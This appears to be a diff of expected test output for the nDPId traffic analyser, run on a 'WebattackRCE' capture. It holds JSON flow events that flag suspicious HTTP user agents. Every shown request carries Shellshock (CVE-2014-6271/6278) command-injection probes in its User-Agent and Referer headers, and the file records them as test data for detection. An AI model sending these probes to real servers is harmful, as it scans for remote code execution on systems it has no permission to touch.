00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1576420277439,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277439,"pkt":"AAAAAAAAAAAAAAAACABFAAETyIlAAEAGc1l\/AAABfwAAAcVWH5DyzvBYc36tz4AYAED\/BwAAAQEICp1m\/eedZv3nR0VUIC9yZXN0b3JlX2NvbmZpZy5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/restore_config.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/restore_config.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1576420277442,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277442,"pkt":"AAAAAAAAAAAAAAAACABFAAEICV1AAEAGMpF\/AAABfwAAAcVYH5Aa\/jGM\/2VZ0IAYAED+\/AAAAQEICp1m\/eqdZv3pR0VUIC9ydWJ5LnJiIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ruby.rb","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ruby.rb","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00762{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1576420277443,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277443,"pkt":"AAAAAAAAAAAAAAAACABFAAEH1YJAAEAGZmx\/AAABfwAAAcVaH5CqXO1RjdaXCYAYAED++wAAAQEICp1m\/eudZv3rR0VUIC9zZWFyY2ggSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1576420277444,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277444,"pkt":"AAAAAAAAAAAAAAAACABFAAELsxNAAEAGiNd\/AAABfwAAAcVcH5B0n4vBZle5N4AYAED+\/wAAAQEICp1m\/eydZv3sR0VUIC9zZWFyY2guY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1576420277446,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277446,"pkt":"AAAAAAAAAAAAAAAACABFAAELQstAAEAG+R9\/AAABfwAAAcVeH5AckXoZTNNhQ4AYAED+\/wAAAQEICp1m\/e6dZv3uR0VUIC9zZXJ2ZXIucGhwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/server.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/server.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1576420277448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277448,"pkt":"AAAAAAAAAAAAAAAACABFAAEHr2pAAEAGjIR\/AAABfwAAAcVgH5ABL5e76\/gzuYAYAED++wAAAQEICp1m\/fCdZv3wR0VUIC9zdGF0dXMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/status","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/status","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1576420277449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277449,"pkt":"AAAAAAAAAAAAAAAACABFAAELeuBAAEAGwQp\/AAABfwAAAcViH5Bf0UINj\/XlzYAYAED+\/wAAAQEICp1m\/fGdZv3xR0VUIC9zeXNpbmZvLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sysinfo.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sysinfo.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 